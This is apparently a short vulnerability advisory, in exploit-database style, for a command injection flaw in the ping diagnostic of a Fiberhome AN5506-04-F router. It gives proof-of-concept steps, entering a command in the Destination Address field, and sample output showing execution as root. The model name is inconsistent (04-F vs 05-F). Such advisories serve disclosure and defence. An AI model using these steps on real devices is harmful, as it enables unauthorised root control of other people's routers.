Fiberhome AN5506-04-F Command Injection

Fiberhome AN5506-05-F suffers from a command injection vulnerability.

MD5 | 060deecd3c2ad0da82d4a03242288cfc

# Exploit Title: Fiberhome an5506-04-f  a -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage:
# Version: RP2609
# Tested on: Windows 10

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

Proof of Concepts :

1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping


PING ( 56 data bytes
64 bytes from seq=0 ttl=64 time=0.617 ms
64 bytes from seq=1 ttl=64 time=0.259 ms
64 bytes from seq=2 ttl=64 time=0.215 ms
64 bytes from seq=3 ttl=64 time=0.214 ms
64 bytes from seq=4 ttl=64 time=0.218 ms

--- ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
uid=0(root) gid=0 groups=0

Related Posts